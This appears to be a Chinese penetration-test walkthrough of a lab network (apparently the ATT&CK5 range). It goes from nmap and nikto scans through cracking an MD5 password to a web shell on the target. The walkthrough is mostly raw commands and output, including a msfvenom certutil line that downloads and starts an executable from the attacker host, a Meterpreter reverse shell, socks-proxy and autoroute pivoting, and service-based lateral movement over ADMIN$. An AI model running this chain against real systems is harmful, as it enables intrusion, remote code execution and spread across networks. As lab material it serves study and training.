⚡ root@kali ~ nmap -sP 192.168.183.0/24 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 05:06 EST Nmap scan report for192.168.183.1 Host is up (0.00033s latency). MAC Address: 00:50:56:C0:00:01 (VMware) Nmap scan report for192.168.183.134 Host is up (0.00017s latency). MAC Address: 00:0C:29:69:C1:18 (VMware) Nmap scan report for192.168.183.254 Host is up (0.00017s latency). MAC Address: 00:50:56:F8:FE:A2 (VMware)
开启了HTTP服务和Mysql
1 2 3 4 5 6 7 8 9 10 11
⚡ root@kali ~ nmap -sT -min-rate 10000 -p- 192.168.183.134 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 07:02 EST Nmap scan report for 192.168.183.134 Host is up (0.00091s latency). Not shown: 65533 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 3306/tcp open mysql MAC Address: 00:0C:29:69:C1:18 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 26.44 seconds
⚡ root@kali ~ nmap -sT -A -T4 -O -p 80,3306192.168.183.134 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 07:03 EST Nmap scan report for192.168.183.134 Host is up (0.00053s latency).
PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.5.38) |_http-title: Site doesn't have a title (text/html; charset=utf-8). |_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38 3306/tcp open mysql MySQL (unauthorized) MAC Address: 00:0C:29:69:C1:18 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Microsoft Windows 8.1 R1 (96%), Microsoft Windows Phone 7.5 or 8.0 (96%), Microsoft Windows Embedded Standard 7 (96%), Microsoft Windows Server 2008 or 2008 Beta 3 (92%), Microsoft Windows Server 2008 R2 or Windows 8.1 (92%), Microsoft Windows 7 Professional or Windows 8 (92%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (92%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (92%), Microsoft Windows 7 (90%), Microsoft Windows Server 2008 SP1 (89%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.53 ms 192.168.183.134 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 44.39 seconds
⚡ root@kali ~ nmap -script=vuln -p 80,3306192.168.183.134 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 07:05 EST Nmap scan report for192.168.183.134 Host is up (0.00030s latency).
PORT STATE SERVICE 80/tcp open http |_http-trace: TRACE is enabled |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. | http-enum: | /robots.txt: Robots file | /0/: Potentially interesting folder |_ /index/: Potentially interesting folder | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | http://ha.ckers.org/slowloris/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 3306/tcp open mysql MAC Address: 00:0C:29:69:C1:18 (VMware)
⚡ root@kali ~ nikto -url 192.168.183.134 -p 80 - Nikto v2.5.0 --------------------------------------------------------------------------- + Target IP: 192.168.183.134 + Target Hostname: 192.168.183.134 + Target Port: 80 + Start Time: 2025-02-19 07:22:12 (GMT-5) --------------------------------------------------------------------------- + Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38 + /: Retrieved x-powered-by header: PHP/5.5.38. + /: The anti-clickjacking X-Frame-Options header isnot present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options + /: The X-Content-Type-Options header isnotset. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ + No CGI Directories found (use '-C all' to force check all possible dirs) + Apache/2.4.23 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34is the EOL for the 2.x branch. + OpenSSL/1.0.2j appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 112023. + PHP/5.5.38 appears to be outdated (current is at least 8.1.5), PHP 7.4.28for the 7.4 branch. + /: Web Server returns a valid response with junk HTTP methods which may cause false positives. + /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing + PHP/5.5 - PHP 3/4/5and7.0 are End of Life products without support. + /#wp-config.php#: #wp-config.php# file found. This file contains the credentials. + 8101 requests: 0 error(s) and10 item(s) reported on remote host + End Time: 2025-02-19 07:26:25 (GMT-5) (253 seconds) ---------------------------------------------------------------------------
⚡ root@kali ~/Desktop/test/ATTCK5 john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5 hash Using default input encoding: UTF-8 Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3]) Warning: no OpenMP support for this hashtype, consider --fork=8 Press 'q'or Ctrl-C to abort, almost any other key for status admins (?) 1g 0:00:00:00 DONE (2025-02-19 08:15) 33.33g/s 4467Kp/s 4467Kc/s 4467KC/s applecute..PHOEBE Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably Session completed.
得到密码admins ,访问add.php 输入密码,成功进入
获得立足点
使用msfvenom生成payload
1 2 3 4 5 6 7
⚡ root@kali ~/Desktop/test/ATTCK5 msfvenom -p cmd/windows/http/x64/meterpreter/reverse_http lport=4444 lhost=192.168.183.133 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: cmd from the payload No encoder specified, outputting raw payload Payload size: 125bytes certutil -urlcache -f http://192.168.183.133:8080/9Bk3xvWa9yQk92crn4JtvA %TEMP%\AVQtnvStA.exe & start /B %TEMP%\AVQtnvStA.exe ⚡ root@kali ~/Desktop/test/ATTCK5
然后MSF开启监听
1 2 3 4 5 6 7
msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload cmd/windows/http/x64/meterpreter/reverse_http payload => cmd/windows/http/x64/meterpreter/reverse_http msf6 exploit(multi/handler) > set lport 4444 msf6 exploit(multi/handler) > set lhost 192.168.183.133 msf6 exploit(multi/handler) > run [*] Started HTTP reverse handler on http://192.168.183.133:4444
然后在web端大马的命令执行中执行生成的payload
成功弹回shell ,获得立足点
1 2 3 4 5 6 7
[*] Started HTTP reverse handler on http://192.168.183.133:4444 [!] http://192.168.183.133:4444 handling request from192.168.183.134; (UUID: xyuftsit) Without a database connected that payload UUID tracking will not work! [*] http://192.168.183.133:4444 handling request from192.168.183.134; (UUID: xyuftsit) Staging x64 payload (204892bytes) ... [!] http://192.168.183.133:4444 handling request from192.168.183.134; (UUID: xyuftsit) Without a database connected that payload UUID tracking will not work! [*] Meterpreter session 4 opened (192.168.183.133:4444 -> 192.168.183.134:49411) at 2025-02-19 08:36:17 -0500 meterpreter >
meterpreter > bg [*] Backgrounding session 4... msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy msf6 auxiliary(server/socks_proxy) > set version 5 msf6 auxiliary(server/socks_proxy) > run [*] Auxiliary module running as background job 0.
添加路由
1 2 3 4 5 6 7
meterpreter > run post/multi/manage/autoroute
[*] Running module against WIN7 [*] Searching for subnets to autoroute. [+] Route added to subnet 192.168.138.0/255.255.255.0from host's routing table. [+] Route added to subnet 192.168.183.0/255.255.255.0 from host's routing table. [+] Route added to subnet 169.254.0.0/255.255.0.0from Bluetooth vc6.
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.138.138:445 ... OK [*] Requesting shares on 192.168.138.138..... [*] Found writable share ADMIN$ [*] Uploading file KNuZDebw.exe [*] Opening SVCManager on 192.168.138.138..... [*] Creating service efVz on 192.168.138.138..... [*] Starting service efVz..... [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.138.138:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.138.138:445 ... OK [!] Press helpfor extra shell commands [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.138.138:445 ... OK [-] Decoding error detected, consider running chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute smbexec.py again with -codec and the corresponding codec Microsoft Windows [�汾 6.1.7600]
[-] Decoding error detected, consider running chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute smbexec.py again with -codec and the corresponding codec ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
/image59.png)
/image60.png)
/image61.png)
/image62.png)
/image63.png)
/image64.png)
/image65.png)
/image66.png)
/image67.png)
/image68.png)